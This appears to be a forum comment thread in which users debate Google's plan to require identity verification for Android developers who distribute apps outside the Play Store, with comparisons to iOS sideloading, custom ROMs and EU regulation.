This does not require root access and prevents Android from invoking Play Protect in the first place. (This is what AOSP's own test suite does, along with other test suites in eg. Unreal Engine, etc.)
I personally won't be doing this verification for my open-source apps. I have no interest in any kind of business relationship with anyone just to publish an .apk. If that limits those who can install it to people who disable Play Protect globally, then oh well.
There could of course be side effects in the future when this restriction is rolled out, as in your device's Play Integrity status could be affected and your banking app/phone wallet might not let you perform app-based payments from that device.
The reason I chose the Android ecosystem over the Apple ecosystem, once I found out that the Maemo/Meego ecosystem was a dead end and the Openmoko ecosystem was a non-starter, is that the Android ecosystem allowed me to develop and install my own apps on my own devices whenever I wanted to, without arbitrary limitations like having to periodically plug the phone into my computer to renew some authorization. Additionally, there was even for some devices the possibility of rebuilding the whole operating system with any changes I desired.
If I'm not allowed to develop and install my own apps on my own phone, what advantage does Android have over Apple?
DO NOT UPLOAD YOUR ID/INFO TO GOOGLE. I put my game on their app store some years ago, and they doxxed me right on the app store. Google posted my name and home address right on the game page. Not great when I was already receiving death threats! Later on, had a rando show up at 3AM one night and had to call the cops out. I moved after that. Google is absolutely not to be trusted to keep this data confidential. If Google demands I do anything with them, I'll just tell my fans to install lineageos or whatever instead -- no way in hell I'm having ANYTHING to do with google ever again. GFY google!
Oh, yes... Actually I remember: it was a long slow series of accepting small artificial restrictions. I remember people laughing at me at the time. They said it won't matter, they didn't care, that I was paranoid...
and don't forget all the people with the dismissive remarks about how it didn't affect them on their Graphene or Calyx phones. We're all downstream of something. The real product of Android for us was always the interoperability with the normal world for the tinkerer.
Their own store has a dozen "AI Photo Editor Pro 2026" and "Turbo Deluxe Ultra VPN Secure Pro" apps that are "approved" and yet for sure have malware at worst and at best steals your data and serves nonstop pop up ads
Android is getting more closed and iOS more open, I expect more people dissatisfied from both camps. We’ll have less choice overall as they gravitate towards a common middle ground.
Makes sense why they had to get rid of the "don't be evil" motto. They've been on a roll.
I've seen a lot of similar sentiment on this thread, but the reason I use Android is because it gives me more control than iOS by allowing full-on painless sideloading, and custom distributions like GrapheneOS. They're doing everything they can to turn themselves into a worse Apple. All of the downsides of Apple, but none of the upsides. Apple beats them in every aspect that isn't "openness".
When will the straw break the camel's back? I'm shocked we've let it get to this point with no realistic alternatives. There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
> There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
Yes there is. You all don't understand that they will use remote attestation to force everyone to use approved devices with signed apps on signed OSes only
You won't be able to bank, call a cab, write a chat message, watch a youtube video or do anything relevant on a device anymore that isn't signed, approved and controlled by google. They've made us cattle and now they are going to milk us dry.
> There's no reason a competitive Linux-based smartphone can't exist
There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
In my country, only cell phones certified by the government telecommunications agency (Anatel) can be imported, so I can't for instance go to the Jolla or PinePhone store and buy a Linux-based smartphone; if I tried, it would be sent back the moment the package entered the country. (See https://www.gov.br/anatel/pt-br/regulado/certificacao-de-pro... for details.)
They saw Apple getting away with notarization under the DMA so they're doing the same.
I must admit the mass demotivation strategy is working really well. Seeing this kind of news every single day, affecting you directly and not even being able to do anything
Google is doing everything in their power to make me move to an iphone... between shit like this, effectively bricking some old models of pixels with un-rollbackable patches that destroy batteries, closing down the android development process, making absurd testing requirements to publish apps, etc.
Google doesn't make better phones, they were just less hostile to the consumer. That seems to be going away :(
I'm aware, I'm saying Google is trending towards being as abusive with their software practices as Apple already is, not worse.
And saying that for me anyways the only reason I have an Android and not an IPhone is because they were less abusive. On unrelated metrics like hardware quality Apple generally seems to do better.
If both systems are similar in terms of features and freedom, then I might as well choose the one that tracks me less and offers a more polished experience.
Precisely. If I can't control what I put on my Android phone anymore, I no longer have any reason to use an Android. iPhones have normal USB ports now, and that was the other big barrier.
Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
Leaving Google for Apple, and expecting a more open app store, is going to be disappointing. I’m not a Google fanboy by any means, just pointing out the landscape out there
Apple throttled devices that had a weak battery, because the alternative is the CPU trying to draw more power than the battery can deliver, the voltage sagging, and the phone rebooting.
By itself, this throttling is a good thing and keeps phones usable for longer, because a phone that is slow is better than a phone that randomly reboots.
The problematic part was that they a) didn't disclose it, and b) did this for phones within the warranty period, so instead of the phone visibly crashing and you returning the obviously broken phone, it just lost performance which you might not have noticed in time to get a free replacement.
The Nexus 6P had the same issue with random shutdowns, and although Google refused to do anything about it some users on XDA developed a patch that disabled all the performance cores completely.
> XDA user XCnathan32, along with assistance from two other users, created the fix and put it up for anyone to give it a whirl. Without getting too technical, the fix shuts down all four of the Nexus 6P octa-core Snapdragon 810 processor’s performance cores that seemingly prevent the phone from properly booting
Funny how no one really complained about the random reboots but everyone noticed throttling and assumed their phone was "too old" and they needed to buy a new one. Interesting how this move greatly benefited apples bottom line versus improving actual quality of life for the user considering a reboot is 30 seconds perhaps and a slow phone is slow for every second you use it.
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery
It wasn’t guise, it actually increased the battery life quite much. People complained about the battery of old phones. The problem was that users did not have choice to opt-out.
There was the opt-out part, but also the complete silence around the issue that comforted people into thinking they needed new phones every 2 years instead of just replacing the battery.
Apple wouldn't have had to do all the song and dance if from the start a popup warned the users their battery lost capacity and should be serviced.
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
It's not about 'saving battery' its about preventing undervoltage that janks everything up.
Having dealt with more than one windows phone that didn't have this feature or had it in a bad way (i.e. 520/521 would just 'reboot', 640 and 950XL would just kill an app) I wish Microsoft would have figured that crap out lol.
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
Nope. There was an issue in iPhones and Nexus phones that had been used for a few years where a worn battery could no longer maintain a voltage high enough to meet instantaneous SOC power demand, resulting in unexpected device shut downs.
Apple got the device to quit shutting off without warning by throttling older devices and Google did nothing and just told users to buy a new device.
They both got sued, and both lost.
> If you currently or formerly owned a Google Nexus 6P smartphone, we have some good news: you might be eligible for a cash rebate for those bootloops and spontaneous shutdowns the device was known for.
It's not a bug or issue with those phones, it's how batteries behave -- over time, they lose both their capacity and the power they output. Apple decided to throttle their phones via software instead of letting them crash.
I've said this before, but it was the right idea executed the wrong way. iPhones give you a warning when they overheat, and this throttling should have gotten a similar warning with a link to an FAQ explaining the battery dynamics.
No, the batteries had degraded to the point that they could not supply enough voltage and current to stably run the chip at full frequency. Replacing the battery would restore full performance.
Yep, available to anyone. It's much more restrictive though. Basically you need a valid developer certificate to sign apps. You can use your own with a free developer account but you only get so many tokens per week and apps need to have their tokens refreshed weekly.
You can also use an enterprise developer certificate that lasts forever but if Apple revokes it then the app stops working until you get another working cert.
It does require you to turn on iOS developer settings by connecting to a Mac with Xcode installed to enable but then you can manage app installation and refreshing via an App Store like Alt Store. EU has different system where there is no limit on amount of sideloadable apps but the apps still need to be approved by Apple. Alt Store also have a EU specific App Store for that purpose.
I side loaded on iOS for a long time. Get Youtube++ for ad free and I forget the Reddit client I used that was side loaded as well. You can run the server on any PC or Mac that will handle side loaded apps and being on the same WiFi network allows the server to automatically refresh the installed apps. Only big downside is updates are not automatic or simple. To update an app you have to download the new app .ipa and then sign it like you were installing it fresh. Usually it picks up the existing configs and data though. So it's not a full app wipe.
The sideloaded subreddit is where I got into it through.
In legal jurisdictions where Apple is forced to allow it, yes. They have a similar scheme for requiring developers to register and are demanding per-install fees for popular apps, though I'm not sure that will survive regulatory scrutiny in the EU.
Otherwise, I think it's possible to use developer tools to temporarily install apps on an iPhone. IIRC this requires a Mac and has to be repeated every few days.
Worth adding on there are methods to update signatures, altstore being one example
Although using their app to help automate that then takes up one the app slots for free accounts
> Google notes “supportive initial feedback” from government authorities and other parties:
Ah, then I guess everything is fine. I'm sure they aren't in favour because it gives governments greater control over what apps we're allowed to have on our phones. That would be absurd.
I feel like that makes the most sense. That this isn't something Google thought up but something that the EU wanted to ensure its government ID app was "safe". Google does benefit but the timing seems to line up.
I think this is another thing that has changed in time. Custom ROM's used to be the defining feature of Android but over time less and less people used it. I think sideloading has gotten to that point as well. Where it's a power user feature that most people don't touch. So Google feels confident in nixing it since it only affects a small group of people.
I mean, the epic games lawsuit specifically involved sideloading. There's still ongoing litigation in one of those suits. Playing fortnite isn't exactly a niche or power user thing.
Fewer people use custom ROMs not necessarily because they don't want to, but because manufacturers began putting hardware on the phones that only they have the firmware for. I have a Samsung phone that I replaced as my daily driver because the phone speaker broke from sweat. Other than the speaker it works literally perfectly. I'd love to use it to try different alternative OSs, but AFAIK, even though it's only from 2021, not a single project supports it.
Still is, all of those Chinese ROMs/phone manufacturers thriving because of this. The Chinese phone market would literally be non-existent if it weren't for the ability to run binaries outside of Google Play.
Unfortunately, it's not a differentiator at all in the market. Not to enough consumers that it remotely matters. For our niche nerdy subculture it's extremely important, but essentially nobody in the grand scheme of things even knows that binary is a thing that exists.
This would affect a lot apps that are not on the Play Store for multiple reasons... and if I'm going to be stuck with what Google thinks I should be allowed to use, then why not use iOS instead? At least software updates would be better and the overall experience more polished.
I'm thinking it's time for a 2nd phone (in my case old one from cupboard) to become the regular daily GrapheneOS enabled driver and then keep a modern Google(tm) updated one at home for all the "official crap" whenever needed. That way I can also separate banking / paypal / etc. from my carry phone with all it's various apps that I trust to varying degrees.
This was the first thing that crossed my mind. If it’s not too much money and hassle I could buy a second device for GrapheneOS and tether to the cheapest phone I can get for the official ecosystem.
Really though, it doesn’t have enough impact for consumers. If I get unfairly banned as a developer, no one even notices because that’s nothing more than an opportunity for another developer to step in.
Those are the moments I am starting to fantasize about starting a customer protection group that is sufficiently committed to follow through on organizing boycotts. Naturally, reality hits once you see average human on the road ( on a highway, full speed ). We might be lost a species.
Not for me at least, 3DS requires approval in an app on my phone. I'd love if the banks just used TOTP instead but no, I have to use their app, some of which don't work with an unlocked bootloader, so I have to have stock android
I had to do a government ID upload and a live face scan to install my banking app on a new phone even though I had other devices I could have used to authorize it. It made me want to switch banks, but where do you go?
I cannot resist the urge to point out that we wouldn't have had this problem if people actually sticked to free software instead of "commercial use friendly" open source licensing
In practice we see the reverse and GPL projects being rewritten as more permissive.
The busybox/toybox case looks especially relevant and interesting:
> In January 2012 the proposal of creating a BSD license alternative to the GPL licensed BusyBox project drew harsh criticism (…). Rob Landley, who had started the BusyBox-based lawsuits, responded that this was intentional, explaining that the lawsuits had not benefited the project but that they had led to corporate avoidance, expressing a desire to stop the lawsuits "in whatever way I see fit".
Such a shame that the Free Software Foundation has been such an awful steward of the GPL. The fact that the GPLv3 didn't close the network hole is a decision made either out of myopia or abject cowardice, you shouldn't need a separate license (AGPLv3) to ensure true freedom of the codebase.
Free choice in the market is a lie anyhow. You are limited by what is actually been made available in the marketplace in sufficient quantity. "You can have any color you want, so long as it is black." - some old racist industrialist.
An interesting idea. But who would have to "stick" to such software? The users?
It seems to me that most of the users do not care much about what kind of software their phone runs, unfortunately. As long as it works with Instagram or whatever other big brand social media is trending these days, they are happy. Which is I think understandable.
The companies developing the apps are in my opinion driving this cultural shift. And they are doing it mostly because it brings them commercial advantages. Which is, I think, also understandable.
Everyone involved seems to to what appears to be in their best interest. And yet, collectively, we as a society get a worse outcome overall. This phenomenon perhaps has a name.
In order to break out of it, I think that the incentives on both sides need to be adjusted. It needs to be in the companies' interest to produce apps as open source. And the users need to want them.
The only way I can think of to achieve that kind of a change is when the open source apps and products become just inherently better than their proprietary alternatives. In all categories. Then, the people would want them. And then the companies will start to produce them.
It is a very tough goal. The commercial apps do not have to be better in all categories to retain their users. They can use vendor locks or other business strategies which restrict the users' ability to leave them.
Open source apps cannot do such things. The only fair ground on which they can compete is their quality.
The core benefit of Android over iOS for me has always been that it's my device, not Google's.
They've been chipping away at this over the years. Safetynet was the first offense, but if they start restricting app installation from sources of my choice (I hate the term "sideloading"), there's not much advantage left.
Mobile phone platforms are reverting back to the pre-iOS/Android reality where you have to jump through tons of hoops to even make an app let alone run a viable business with it.
> The requirement will go into effect in September 2026 for users in Brazil, Indonesia, Singapore, and Thailand. Google notes how these countries have been “specifically impacted by these forms of fraudulent app scams.” Verification will then apply globally from 2027 onwards.
At least most of the world has until 2027 to install LineageOS or GrapheneOS.
So I guess now is the time to decide whether Pixel is actually something I would want to purchase from Google ( and support the decision they just made with cash money ) or.. what exactly. I am not a Apple fan either.
Apps are increasingly failing to run on grapheneos because Google is pushing for the play integrity verification. More and more apps, some critical like banking apps, some not at all, require your device to be running an official rom signed by Google.
So I will go back to carry two devices, I guess. Like when I had a Jolla Phone and an Android phone. Or before that with a Palm PDA and a dumbphone. It is convenient to have everything combined in a single device, but guess that turned out to be just a temporary luxury.
Great for you. What about the normies ? You know the people that protest and make things change, how they are going to organize themselves when their government gets authoritarian and apple/google obeys to governments request to forbid some app. You know like what happened during Hong Kong protest with Apple App Store.
I’m not saying I have a solution but looking at yourself and pretending it’s all fine because you’re 10 times more tech savvy than the average citizen isn’t a viable answer. That kind of issue must be solved by regulation, hopefully Europe gets to bring back on earth whoever at Google agreed on that idea.
These days I don't really want a smartphone at all, but begrudgingly use one for things like mobile banking, receiving SMS tokens, etc.
If someone made a screenless powerbank-shaped Android device, I might be interested. The device would double as a 5g wifi modem, and to access the UI you'd remote in over VNC from a laptop, or unrestricted mobile device like a PinePhone.
The set up I run consists of an older 5g phone that hospots to my other phone, no apps of consiquence on either phone, I sign into my email through web mail, and sign into banking through a browser, all of my apps come from fdroid and similar, mostly used for media, manual updates for those through the fdroid web site.
As to the device you mention, it should be possible to take a phone apart and spoof* all of the mic's and cameras, likely the gps, and haptic motor and speakers as well, and have a 5g touch screen modem with plain internet, or keep the speakers and it's a media device, or put all the audio on a micro switch.
* use matched resistors, or black out the sensors
detach the antena for gps
lets just say I realy dont like bieng advertised to
As a developer of android apps that get distributed outside of the Play store, a Google identity verification system sounds like a nightmare. What if I'm deemed to be politically incorrect? Will Google brand safety exclude me?
Time for a Steam Phone. Or FirefoxOS reloaded. The general purpose mobile computing market must be sizeable. I cannot believe everybody just puts up with these increasingly draconic restrictions.
I think a big problem is that the users have been trained to accept the status quo. I mean back in the Feature phone days we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
Also, due to the cost of physical media piracy was rampant even amongst boomers. People knew and had the option to buy a dvd player that could play video cd because that’s how movies were ripped.
Even during the early iPhones we were so stripped of even basic features that a jailbreak was 100% required if you wanted to even basic things like taking videos or changing the Home Screen background.
None of this is necessary anymore. The users gets the phone and it just works from their perspective at least.
So who is going to try to run a business off of nerds like us who want to have this sort of control over our devices (I’d call it freedom but the average user doesn’t feel unfree)?
Well that sucks. So basically all the money weve had taken from us for our play store apps is now "just" going to be spent on administering the registration details of 800 million chinese developers and 6 billion bot accounts.
When I switched from Android to iOS, this was one of the things I missed a lot: the ability to write my own app and side load it on my phone. Even more so with the advent of LLM. Oh well, now I don't have to worry about that.
Yeah... They just want to ban NewPipe. It's sad to see Android getting locked down, also with the source closing of the development branches, etc. I can as well buy Apple then, it doesn't matter anymore.
Most Android apps are crapware anyways. The only respectful apps that I know are open-source, and are being kicked out the of play store progressively.
This is crazy, this means 10 years from now only terrorists will distribute software. Unacceptable! How many platforms now allow one to build and distribute a binary?
Taking the article at face value, they'll have to register with google and have their apps be signed. Presumably this is subject to less review than the play store (eg. you don't have to justify your permissions list or whatever[1]), but there's no guarantees that developers will bother with the hassle. A lot of developers are willing to put some release up on github, but not dox themselves to google.
The worst part is the Orwellian opening sentence they start with in their blog post [0]:
> You shouldn’t have to choose between open and secure
2+2=5
Truly the end of an era. I've spent nearly two decades buying Android phones because of a single checkbox in settings that let me have the freedom I consider essential to any computing device that I own.
In a way, it's liberating, I've missed out on a lot from the Apple ecosystem because of that checkbox. Maybe finally I can let go of it now the choice is out of my hands.
"A recent analysis by the company found that there are “over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.”
Ok, but what's the real damage? In other words, how many installs and how much money siphoned from users and legit apps?
Disgusting, horrifying, but utterly predictable. A dark day indeed, once no major mobile platform allows running whatever code you wish. Sideloading isn't really sideloading if the app has to be signed by the gatekeeper.
Isn't this a death knell for F-Droid, at least for running on most hardware? Since they require their own builds/attestation?
The Overton Window for computing keeps inching towards gatekeepers having total control over devices. I can't help but imagine myself lurching along on the last somewhat open hardware I can cobble together in a couple of decades, because I refuse to drink the verification can to continue...
This was probably the reason Nokia died. Symbian development, already cumbersome and app deployment required some such procedure. I remember there was an joint effort in a china based forum and many of us got a cert and a key for our phones. I was reading Nokia obituaries from its executives and the sorry state of Symbian development and app deployment was not considered as a cause. So here it, is young executives repeating a simplistic and destructive strategy. ibm, xerox, nokia and intel will be very proud.
Hmm this is weird. I've recently been considering switch back to Android because of how locked down ios is and it sounds like Google's now gonna do the same thing? Will there be a way to deactivate this?
If you read the article you'd see that this is a separate account type that does not have a submission fee or require legal documents. It also doesn't prevent you from side loading. It's just part of the current scare screen system when it comes to side loading.
> separate account type that does not have a submission fee or require legal documents
We do not know yet who will be considered "hobbyist". I would say they might check the user base. When hitting app installation threshold for let say 1,000 users, they will force you to pass the full legal check. Otherwise they will start blocking any further installations.
> * You will need to provide and verify your personal details, like your legal name, address, email address, and phone number.
> * If you're registering as an organization, you'll also need to provide a D-U-N-S number and verify your organization's website.
> * You may also need to upload official government ID.
Only one of those three applies to organizations.
>A note for student and hobbyist developers: we know your needs are different from commercial developers, so we’re creating a separate type of Android Developer Console account for you.
Nothing about it says anything about having lighter requirements, just not going through a Play Console link. Even if the requirements end up being "lighter", the minimum will always be at least "link a Google account", which is already a massive privacy breach.
> It also doesn't prevent you from side loading.
It absolutely does. Quoting from Google:
>Starting next year, Android will require all apps to be registered by verified developers in order to be installed by users on certified Android devices.
certified Android devices being... 99.9% of all Android devices in existence.
Then you're familiar with the process of getting a DUNS number. Because that is a massive barrier for individual devs and small teams. That is actual legal paperwork. Not having to do that makes the process significantly easier.
It's not a massive privacy breach. If you are so anti-Google yet use their devices then most likely you're already only distributing to GrapheneOS or LineageOS anyway. For most people who already have a Google account this is a very small bar to clear.
Getting a DUNS number is ass, getting the 20 testers is ass, etc etc.
I do not want to give Google my government ID to write a shitty little app that only my family will use, or only close friends use and it gets sideloaded through sending it on chat. I do not want people making apps to skip ads on YouTube giving out their government ID. I do not want people making apps that might get them in trouble with their government to give out their government ID to Google.
So then don't. Are you seriously scared for the revanced devs? Their code is posted on Github. Their accounts are all public accounts with names and locations. Maybe don't white knight people who don't need it.
You failing to see the issue and dismissing is so easily is mind blowing. Revanced is nothing, he is referring to a whole ecosystem of app made by randomn for other random that Google should have no business requiring government id and giving approval.
Hong Kong protestors bought Android phone en masse when Apple removed apps they used to fight back on Chinese censorship, if Google is allowed to do the same you can say goodbye to freedom of information in many countries. You’re focusing on revanced when it’s the least of the issue.
I saw this coming a mile away. Everyone said you could install whatever you wanted on Android, but you were always jumping through some crazy hoops to do so. (compared to a general propose computer)
they've been demanding signing keys for apps distributed on the play store for years.
The only credible explanation I can come up with is that they need the keys in order to produce indistinguishably backdoored versions of applications, handy for tools like signal.
Otherwise one would never think of requesting the private keys-- if google wants to rebuild apps themselves they could sign with their own keys and possessing anyone elses private key is just pure liability as if there is any discovered abuse they can't show that they weren't the vector.
China will push own Android OS forks into other markets even harder, if they do it fully open-source then bonus for them, users will force devs (banking apps etc) to get more support. A good example is one EU bank which publishes to Huawei's AppGallery to support non-Google certified Android phones.
One thing that annoys me is that a lot of F-Droid apps are obviously naive ports with overbroad permissions like "can read the entirety of storage", but that's still better than the all-consuming Goo.
These companies need to be destroyed by antitrust violations. I am so tired of these tech companies abusing their market position. I want the FTC to stop being toothless and useless and just absolutely crush these companies. The amount of disdain I have for these companies can't even be properly expressed.
These companies are in bed with the government, you're not going to be saved by any legislation. Many people on this site supported Google censoring the Covid anti-vax idiots, but it should have made it very clear that Google was working at the behest of the government. They're in bed together; the government gets to do an end-run around the constitution, and Google gets to rely on special government privileges and protection. Win-win.
These corpos are part of the government, more or less, and they simply implement the edict to get rid of privacy. Not only in America. Smartphones have become eyes of the govs, while the Internet - something akin to their neural system. What's more interesting is why the govs feel so paranoidal and insecure recently? What are they afraid of?
I rely on an open source app called xDrip to manage my diabetes. It's way way way better than any of the official apps. It's not distributed on the app stores for obvious reasons. Many others rely on this app as well. Are we cooked?
It seems that it was only about time… it just feels like the pace of enshittification with big tech being able to get away with anything is crazy!
I’m hoping that projects like Precursor can take off because we’ve buried ourselves in such mountain of complexity that seems like only a billion/trillion dollar big tech company can make an OS.
But then again, some body called BS on browsers and we might have a good option soon in Ladybug!
Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
Now there's also no more sideloading, so what purpose does Android even serve anymore?
>GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
The comment in the thread you linked directly contradicts the claim that "bootloader unlocking will also go away".
> iOS devices [..] have much less data collection than stock Android
iOS does a tremendous amount of data collection including for the usage of ads as per Apple's privacy policy. All the same types of data that stock Android collects, even.
You may believe Apple is a generally better steward of that data than Google, but using iOS does not reduce the amount of data being hoovered up in any meaningful capacity.
> Now there's also no more sideloading, so what purpose does Android even serve anymore?
I hate this change, but I still prefer Android. iOS is hardly perfect nor does it do everything better...
Exactly, the only reason to be a weirdo and have android in the first place was because there's so many good apps available outside the play store, if they lock it down just like Apple then what's the point?
Can you download, build, and install a basic Android system these days without touching a single piece of closed code? Absolutely. Will it be able to do much without closed binaries? No.
Android isn't GNU/Linux where there's a general ethos of making everything in userland FOSS if at all possible. Rather, it's a free OS that both Google and manufacturers can do anything they want with, including shove a ton of spy and bloatware on it, then make it to where you can't get rid of those things, at least not easily.
The optimism from 15 years ago surrounding FOSS in the mobile space is on its deathbed.
> Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
Because Google-free AOSP-derived Android distributions are far more versatile, offer far more freedom, impose far fewer restrictions and tend to end up being far less expensive than whatever the fruit factory decides their dedicants have to use today. If Google goes the way of the fruit folks and AOSP no longer offers these freedoms the next step is not to surrender to the Church of Apple but to find a way to evade those restrictions.
> Google is explicit today about how “developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer.”
« Développer will have freedom » yet they are entitled to Google’s verification.
It’s just another stone in the grave of Android and even though I shipped off this sinking ship 6 years ago to iOS, this is still concerning because ultimately apple’s IOS is in competition solely with Android.
If Android gets so bad it has all the disadvantage of iOS, some more, for instance with the embedded spyware that manufacturer are paid to include, and none of the good side of iOS, then everyone lose. Apple doesn’t have to compete anymore, they just have to not suck.
Without an apple ID you can compile an iOS app, but can only run it in an iPhone Simulator on a Mac.
With a free apple ID (no additional registration needed) you can also install your compiled iOS app on your iPhone and have it working for 7 days before you need to re-install it.
Is it really different from what Google is doing ? Not being to compile or user not being to install have the very same consequence : your app can’t be used.
This has the potential to be disastrous for Google, but maybe not.
Personally: I don't use Apple because I like being able to whip together little apps to side-load without having to check in with a walled-garden mothership. If Google is going to move closer to Apple in that regard... Apple's UX ecosystem is better, so I have far fewer reason to keep using Android.
I suspect this won't be disastrous for Google, because where will people care about this go? Apple, who is even more restrictive? This is just another in a long series of incidents showing why we desperately need a real alternative to the mobile duopoly. I would ditch Android over this, but there's no realistic alternative available to me.
I think the only thing hat can save us is a jailbreak. Either for iOS or Android to let you sideload apps.
Alternatively, and that’s almost bullshit, the dumb phone trend continues and we might get devices like PDAs. Get a dumb phone and a small camera and then your PDA for everything that is essentially an app. Not sure what OS they’d run but I don’t see another way.
Android also allows apps that can run arbitrary code, like emulators and various other runtimes. I think iOS still doesn't? I have not written an Android app in ages, other than at work, but I often write silly little things running in the Löve 2D Loader, or TIC-80, or DOSBox, or just command-line tools running in Termux (I hear there is an X-server as well to run GUI applications from Termux?).
As long as they still allow running stuff inside of apps like that I will probably not abandon ship yet.
"The changes will affect all certified Android devices once live". AKA GrapheneOS should remain unaffected (as it is not "certified", per Google parlance), and F-Droid should remain available - in theory.
If they keep up this "boil the frog slowly" crap though, I may be migrating off of Android and over to a strictly Linux-based phone, like a PinePhone, Librem, etc.
Fuck the scumbags at the top of big tech making decisions like these.
AOSP is being killed piece by piece - zero community engagements, infrequent dumps with no commit logs, moving everything into Google Play services and recently no more binaries for Pixel phones just to make third party ROM developers lives a little more miserable.
This combined with the 'age verification' coming to all Google properties means it is a very small step from that new world to full Google verification of everything you visit and everything on your device, at any time, for any reason with the penalty being incontestable ban from your device, apps and data.
Get ready for facebook style 'we are interrupting you for a video selfie because we have detected you are a threat' across all google properties (Android, Chrome, Gmail, Maps...).
Dick move. Go back to "do no evil" big G. Remember how you used to be the kool kid on the block? Now you've just become the grown up you showed contempt for in your prime time.
I doubt I'll move away from Android too soon, but that definitely makes me reconsider whether any Google services have a right to CPU time on my device.
> Starting next year, Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store.
Odd little phrase, "distributing their apps on Android devices".
I think "distributing" in this context is in the sense of product distribution, not in the sense of distributed systems.
But "distributing...on" sounds a little odd, like Google is still providing a distribution service. (Contrary to all the precedent of how we've thought of installing software, other than the proprietary, captive-user app stores.)
And so, maybe "distributing...on" makes it sound more like Google is (once again) entitled to gatekeep what you can run on your device/computer.
> However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option. Google says this will help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users’ personal data.
Maybe it's not "developers who appreciated the anonymity" (which we immediately try to conflate with bad actors), but that the whole point lately has been to stop the greedy proprietary lock-in app store monopolies, and not have them gatekeeping what everyone else can do.
It is. Notarization like Apple does is also legal. In fact the EU commission would welcome this with open arms since they can now access the personal data of every developer and can order Google to ban every app they want. This goes hand-in-hand with their new "Digital wallet" app that will be launched next year.
Google is really turning into a dystopian company, destroying any goodwill their virtuous employees created in the past. It feels like they are primed to be the main turnkey tyranny facilitators.
Additionally, this kills apps like Revanced, NewPipe, SmartTube that will now be required to give out ID to Google, surely that's something they really want to do. All Open source development is at threat, Google's absolute dogshit procedures already imposed for the play store now imposed to the entire ecosystem. All for a shitty system that breaks down to "registering package names". Cool then, guess it's time to typo squat on every variant of com.faceboook.app, because users definitely check the package name and not "oh the icon is right and so is the title".
More and more locked down devices, Android source releases only being published once a year, device drivers for reference devices disappearing, and now, verification of all your software for your "security". The war on general computing is well and truly on.
They already have a version of that - it's called Windows S Mode (Windows Store apps only, no EXEs or scripts, Edge only for browsing). If they get away with it, they would make it the default. Required Microsoft accounts was a step in that direction.
It will happen. We've been the frogs boiled in the pot for years, accepting forced attestation. Eventually they'll close off running unsigned code, and the PCs will probably have bootloaders locked to Windows as well, so you can't escape.
has anyone had to help any elderly relative with the million scams they've downloaded from google's app store? google does not give a shit about helping regular people avoid scams, it's all just bullshit.
not even to mention the h1b indian kickback stuff that's about to hit them. couldn't happen to a nicer company.
Helping elderly with scams: Yes, today, with Google Chrome. They got tricked into allowing desktop notifications and they look super legit on Microsoft Windows, styled like antivirus notifications and everything, covering the browser UI to get to the settings. I don't see how using closed software helps here
I don't understand, when the EU announced that Apples "actually we need to sign all of these and pay us" requirement is illegal, Google was like "hold my beer"?
That might be one of the reasons. Get rid of competition by legal means.
In my case I keep a copy of K9 Mail 5.6 with the original UI (the reason I choose K9) and I sideload it to every device of mine. I'm afraid that I'll have to register an account and what, claim that that K9 is mine?
While I like to jump on the Google bash train as much as anyone, this is to comply with EU laws.
Apple implemented a similar change for the EU App Store earlier this year to comply with the Digital Services Act (DSA), a regulation that now requires app developers to provide their “trader status” to submit new apps or app updates for distribution.
But this is for apps outside the Play store, so the DSA isn’t at play here insofar as Google needs to be concerned. I don’t think there’s any solid decision on whether third-party app distribution is subject to the trader requirements, but if/when there is, it’d presumably be on the alternative distribution platform to enforce, not Google. Plus, Google already adjusted its policies to comply with the DSA.
For the record, Apple notes that the DSA requirements only impact developers distributing through the App Store, not through alternative distribution [1].
I.e. it doesn't require this at all, it merely requires Google require verification for apps that they themselves distribute. What they've been doing all along until now plus or minus minor bookkeeping details on what data they collect.
Just wonderful. Why does Europe insist on imposing regulations like this that companies then force on the rest of the world? It's one thing if they're benign but this very much isn't.
Only monetized apps (whether that be directly paid, microtransactions, ads, etc.) are legally required to go through that process - and it's a perfectly sensible requirement for the government to say "if you want to run a business, you need to do so as a business".
That is most apps - but not the kind of apps Google is attacking here (personal-scale, actually-free, third-party, etc.). And "apps that are not monetized" is actually a very nice thing to filter for from a user perspective.
Of course, the world's largest malware vendors love to use government action as an excuse to do something else malicious.
I don't like it, however I do feel sympathy for Google. There are probably a lot of idiots who download spyware.apk, it breaks other legitimate apps, steals their information, and then they go online and complain about how Android isn't secure or otherwise doesn't work.
Users should be allowed to brick their device if they're sufficiently stupid, but I feel bad for Google who has to deal with some of those people blaming them.
You don't need to feel bad for them, the Play Store is full of malware so what makes you think this change will help? This is a self-inflicted problem.
I would be surprised if Android has a reputational issue among users. Maybe at the margins, but not enough to significantly affect market share. Most people have already sorted into iOS and Android camps already.
To whatever extent Google may be responding to an issue arising from the market, it is likely at the behest of large companies, especially payment processors, payment card networks, banks, etc. These institutions lately have begun to exert increasing influence over end-user activities, and it would not surprise me if they are playing a part here, too.
It is also common for people to install things on Windows without thinking critically. It is perhaps less common on Mac OS, but I've seen someone get malware that way.
My position is that this is not the OS vendor's responsibility to prevent. A warning is fine. A scan for known malware by default is fine. Beyond that, it's my device and it's my choice to get software from wherever I damn well please even if it might be a bad idea.
